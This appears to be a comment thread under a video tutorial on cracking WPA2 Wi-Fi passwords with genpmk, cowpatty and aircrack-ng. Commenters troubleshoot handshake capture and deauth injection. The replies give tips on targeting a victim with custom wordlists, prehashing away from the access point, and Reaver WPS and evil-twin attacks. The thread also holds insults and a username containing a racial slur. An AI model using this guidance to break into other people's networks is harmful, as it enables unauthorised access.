cirujatuc79: "End of pcap capture file, incomplete four-way handshake exchange, try
using a different capture." :( (wifi WPA2)
Kaloqn Donkov: This is for silly, there is more good ways to do it, not with this fuking
pepin machin: What a freaked up tutorial, waste of my time
Ik Foung Tang: Hi, May I ask If The Password didnt in the wordlist. Can it be find the WPA
password successfull ?
davidangelmorin: Where can I get software
m9alexz: anyone want to hack WEP ? i can teach you how just send me message :)
urbex2007: Pointless! This ONLY works *IF* the password is in one of the word lists on
the computer. If you use a random character, mixed case and special
characters, you will never crack WPA2 or even older WPA. Everyone doing
this type of video will lie to get viewers, not one of them knows how to
crack WPA(2). All they do is copy other videos without understanding how
the software works. Show me a proper WPA2 being cracked without the
password already input on the computer ! You can't!
Justin Hutchens: In theory you are correct. A dictionary attack is only as good as the
wordlist used. You obviously haven't looked at the darkc0de wordlist
though. That and others that are commonly used these days are not composed
of just a list of lower case words. They include actual passwords from
password dumps, and large amounts of number, case and special character
permutations. Additionally, if you are targeting a victim, you could gen up
a custom wordlist with something like cupp.py
Pr. Nizar: I've seen some technic using some honey pots in a video from hacktivity
(watch?v=Ra0dGPYScLQ practical magic begins at 30min)... This one is a
tricky one and seems to be more reliable than just bruteforcing your way
in... But I presume you have to be near your victime and the real AP shut
down or farer than you for the victime... P.S: Sorry for my poor english;
it's only my third spoken language.
Justin Hutchens: That is correct. A successful dictionary attack requires that the
passphrase be located within the dictionary file used.
TheReelMatt: Thanks for getting back to me so fast. It looks like we are on the same
page, that is pretty much exactly what I was thinking except I ran out of
room to type. I am going to look around the internet and see if I can find
anything on it.I am not a programming genious however it would seem simple
to append the data unless its not as simple as (the first half is the
password/the second half is the SSID). I have a feeling that the IEEE would
be smarter than that. It would take someone smarter thenme
PackOfWyvern: 2. I guess its worth noting that I got a new router today( NETGEAR N600
DualBand). I did a packet capture of my new router and deauthed my computer
to get EAPOLs. When I tried cowpatty on it it gave me a message saying
"incomplete 4 way handshake, try a new cap file". I tried about three
different times with different amounts of deauths and waited a good amount
after the deauths to no avail. I suspect the dualband freaks it up. BTW im
using an older eee netbook with backtrack as the only os.
Justin Hutchens: You are correct that prehashing takes about the same amount of time. The
advantage of prehashing, over aircrack is that you can perform the hash
computations without being in proximity of the access point (assuming you
know the SSID). Hypothetically, if you wanted to crack an access point but
you didn't want to sit next to it the entire time, you could drastically
reduce the time spent sitting around suspiciously with your laptop by
prehashing. Hope that answers your question.
spankymcnolan1: I don't crack w.p.a just the routers pin cracking that takes 1minute to 10
hours althouth it needs it enabled for pin authorization wordlists just
take to long even with a g.p.u like hashcat
Dawsonmorph: Best wpa vid I've seen so far, very clear and well put. well done Mr. i'm
now off to crack my own network with this cantenna :)
Justin Hutchens: Yeah, you can still do it. The deauth injection just forces the system off
the WAP so that it has to reconnect. If you can't inject deauth packets,
you will have to wait for either the user or system to reconnect on its
own. Given enough time, it'll happen.
Johnson Doe: It is unlikely that a dictionary would contain that specific password, and
so any dictionary-based attack would not work. However, if your router is
susceptible to WPS hacks (which most routers are) you could just use
reaver. Or try the evil twin method.
Mac Sam: only way to crack it is using rever and wait at least 6 hours :(
Blackhole1686: I have a big problem. I use airodump-ng mon0 and it shows me a list of all
available WAPs and some of the clients (not all). But the Clients aren't
associatet with an bssid. The Probe (essid) is shown correctly, but the
client isn't associated. That why i cant see clients when i look for a
specific bssid. It just appears there, when I areplay that specific client
with de-auth, but when i reconnect as cleint, i don't get the handshake,
because the client then still isn't associated to an bssid.
lars38010: Are you people hack your own computers or other computers -_- ?
Random: im sorry but i dont really understand how this is different from
aircrack..i mean its basicly the same thing under a different name. (both
are dictionary attacks right?) and making a prehashed file takes the same
amount of time as just attacking directly right? could you explain how this
Justin Hutchens: Lot of variables involved there guy. Processing power will have an impact,
but so will the size of the wordlist. And I've never run this on a large
wordlist. There is not much professional demand for wireless pentesting.
These videos (particularly the wireless ones) were just demonstrations of
how the tools work. Even if I had the exact specs of your system and size
of the word list, I'd still just be giving a guess at best. Try it out and
find out. Quit the job if it takes too long.
Justin Hutchens: Thanks for the support Justin. I try to clean up the SPAM at least once a
week. But they keep on coming, lol
Chittu Kudumi: thanks for sharing your experience, I'm afraid that (pre-hashing)
generating "pregendump" file consumes same time as online site attack.
Ofcourse offline attack is really worth-full, but is there a way to fasten
Mac Sam: my wordlist passphrase is not in the dictionary so this gives it no hope
Dynamic4ever90: you r fantastic !!!!!!!!!!
Justin Hutchens: I wouldn't say using genpmk and cowpatty is really faster than aircrack.
Its more just a staging technique. If you aren't in range of an access
point that you want to attack, you can start doing the work with GenPMK.
Also, try CUPP for generating custom dictionary lists...if the generic
one's aren't proving very successful. I've got a video on it too. "Target
Specific Password Cracking with CUPP".
Matt Shepherd: it's taking 2 days to create pregendump file my word list is about 8
gigabytes how long will this take anybody?..
Justin Hutchens: Let me know if you find anything interesting. I could write the program,
but I doubt i have the math skills to create two independent functions that
would produce the same key as the single algorithm. Its things like this
that make me want to do a second bachelors in mathematics.
Justin Wagner: Oi! Get off the rooster you're sitting on and go be an asshole somewhere else.
xbadc0de: what the freak is wrong with your voice? are you crying?
Tsc.ConsultingInc. Mr.: this video is not that clear! your using backtrack in a VM Machine
PackOfWyvern: Thanks! One more thing, what if there arent any EAPOLs in my capture? do i
have to scan for longer? Im trying this on my WPA2 network.
MR.Josh Promjai: hallo brother. i have a big problem , when i put airmon-ng. not have any
thing show me. what it mean ? thank you for your ans !!!
makstukas: yeah he is a noob
Wrong Wahab: could you plz tell me that from where i get a cowpattys ....?
daytona1212: Thank you, this was very helpfull!!
PackOfWyvern: ok so after fiddling a little bit with sending deauth packets I noticed
that I could send them without my Alfa card even being plugged in, is this
supposed to happen or is something else going on?
ANAX ARKANGEL: Salvo si lo vas hacer desde ahí...!!! que además romper una clave WPA Ó
2...ya se ha practicado en demasía...por que no hacer cymothoa y extraer
por otros métodos ya que si en tu diccionario no se encuentra la clave vas
hacerlo difícil o esperaras miles de años...salvo que nazcan los menristor
Anthony Dacey: Excellent tutorial although the genpmk took over 16 hours to generate
against my wordlist which is a little bit bigger than the darkc0de list
infact I stopped the process then ran the crack cowppatty reported no 4 way
handshake found ran the cap file in wireshark and only found 3 way hanshake
ran this through aircrack took just under 4 minutes then imported my genpmk
file in to airolib-ng and created a database ran the crack and took just 1
second a nice learning curve. Thanks
Justin Wagner: No problem mate. I'm trying to get my CEH certs and stuff and when I see
spam on someone who has a CEH well it irritates me XD saying that the tools
we use are fake and then saying that skidrow is popular....makes me want to
puke in my sleep when I see that ;~;
1kekas: thx for the reply... i test handshakes with pyrit and cowpatty ,, its ok?
TheReelMatt: Justin, great video and thank you for sharing with the community. I am an
avid user of Aircrack however I am looking to expand my knowledge of
different tools used in defeating WPA2 encryption. I understand that the
hash is based off of the SSID and the PSK however, is there still a way to
generate a prehashed file for an unknown SSID? I am assuming there isn't
however I just wanted to get your input on the matter. Short of using a
GPU, there is no real way of reducing the time it takes. Thanks
PackOfWyvern: would you mind shooting me a pm so i can better keep track of your
Ale Xander: How do i find the password for a wi-fi on windows 7?I don't know
linux....security type is WPA2-PSK.
Zachary Sloan: I got you now. Hey i also wanted to say that your wpa2 cracking video
helped me in mastering aircrack-ng , at least the part that is important.
If it wasn't for your video i would've never had the patience to learn back
track 5 at all. Thanks a lot man and lookin forward to more videos from
you. Later man.
setniggersfree: I wish i was 20 something again, this is to much to digest. Anyway, thank
you for a great video!
Pr. Nizar: What if your Wifi adapter does not inject (and you're incapable of deauth),
can you still can capture hanshakes? Or is there any techniques to
bruteforce without the handshake?
Mac Sam: Fu is for wpa only
Alex: Meanwhile I'm here at a damn library using their computers :( wish I knew
what he was saying.. Good stuff though..